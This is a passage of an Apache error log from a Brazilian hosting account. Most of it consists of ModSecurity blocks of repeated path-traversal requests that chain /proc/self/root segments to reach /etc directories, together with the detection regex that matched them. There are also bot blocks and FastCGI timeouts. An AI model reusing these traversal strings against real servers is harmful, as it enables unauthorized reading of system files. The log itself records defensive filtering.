"abwGWAkwaGbbGflqUZDFqwAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:21:12.912204 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:36946] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGWOyqAr6etmhZHNpkCQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:21:15.183844 2026] [:error] [pid 19093:tid 140411557287680] [client 74.7.244.43:37852] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwGW1_V7PWP6ixUYl7AAgAAApY"]
[Thu Mar 19 11:21:22.149784 2026] [proxy_fcgi:error] [pid 15826:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57576] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:21:25.842133 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.241.31:35932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGZfu8EFLIOrSqIpuqQwAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:21:30.496092 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.241.31:56926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGal_V7PWP6ixUYl7ABAAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:21:47.920514 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:51048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGe_u8EFLIOrSqIpuqWgAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:21:48.053810 2026] [proxy_fcgi:error] [pid 27403:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58352] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:21:59.726305 2026] [core:alert] [pid 15826:tid 140411565680384] [client 57.141.18.81:60734] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 11:22:16.101803 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59050] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:22:33.244819 2026] [mime_magic:error] [pid 27403:tid 140411658000128] (70014)End of file found: [client 57.141.18.89:33076] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:22:40.065812 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:59652] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:22:41.713391 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:49402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwGsfu8EFLIOrSqIpuqfgAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:23:04.113870 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60150] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:23:29.153834 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:60822] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:23:52.516219 2026] [mime_magic:error] [pid 27403:tid 140411540502272] (70014)End of file found: [client 57.141.18.96:35106] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:23:53.125791 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33214] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:24:16.128171 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33800] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:24:38.201990 2026] [proxy_fcgi:error] [pid 27403:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:34266] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:24:40.177417 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:52538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwHKPu8EFLIOrSqIpuqxgAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:24:42.427324 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:58318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwHKgkwaGbbGflqUZDGLwAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:24:48.305268 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:58322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwHMAkwaGbbGflqUZDGMwAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:25:03.196396 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34842] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:25:13.044787 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:55420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwHSMdf6f5d65gmYZR7KwAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:25:28.197821 2026] [proxy_fcgi:error] [pid 19093:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:35424] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:25:38.911059 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.243.128:42698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwHYhkFeYa1D6dYQnD0owAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:25:55.053820 2026] [proxy_fcgi:error] [pid 27293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36002] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:26:18.121782 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:26:19.833786 2026] [mime_magic:error] [pid 30077:tid 140411540502272] (70014)End of file found: [client 57.141.18.84:38196] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:26:40.139324 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37106] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:26:57.956599 2026] [mime_magic:error] [pid 14269:tid 140411658000128] (70014)End of file found: [client 57.141.18.114:39358] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:27:02.169943 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37578] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:27:34.121772 2026] [proxy_fcgi:error] [pid 30077:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38226] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:28:07.129789 2026] [proxy_fcgi:error] [pid 26799:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38870] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:28:36.029801 2026] [proxy_fcgi:error] [pid 17653:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39582] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:29:03.125954 2026] [proxy_fcgi:error] [pid 27403:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40208] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:29:29.121827 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40808] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:29:48.636712 2026] [:error] [pid 19093:tid 140411658000128] [client 74.7.228.61:56146] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwIXF_V7PWP6ixUYl7BHAAAAoo"]
[Thu Mar 19 11:29:52.149905 2026] [proxy_fcgi:error] [pid 15826:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41366] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:30:14.125842 2026] [proxy_fcgi:error] [pid 19093:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:41826] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:30:38.105819 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42340] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:30:47.369431 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:43380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwIl8df6f5d65gmYZR8EAAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:30:57.063512 2026] [:error] [pid 27403:tid 140411574073088] [client 74.7.243.128:48324] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwIoRkFeYa1D6dYQnD1VgAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:30:59.133799 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42858] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:31:02.026772 2026] [mime_magic:error] [pid 17887:tid 140411725141760] (70014)End of file found: [client 57.141.18.75:44842] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:31:08.408665 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:39358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwIrPu8EFLIOrSqIpurqgAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:31:12.347036 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:52268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwIsOyqAr6etmhZHNplPAAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:31:21.141855 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43350] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:31:30.546980 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:52276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwIwOyqAr6etmhZHNplTQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:31:45.141842 2026] [proxy_fcgi:error] [pid 27293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43922] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:31:48.440892 2026] [:error] [pid 19093:tid 140411557287680] [client 74.7.243.128:53490] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwI1F_V7PWP6ixUYl7BTwAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:31:54.656733 2026] [mime_magic:error] [pid 26799:tid 140411674785536] (70014)End of file found: [client 57.141.18.66:45956] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:31:58.770189 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:52670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwI3sdf6f5d65gmYZR8SQAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
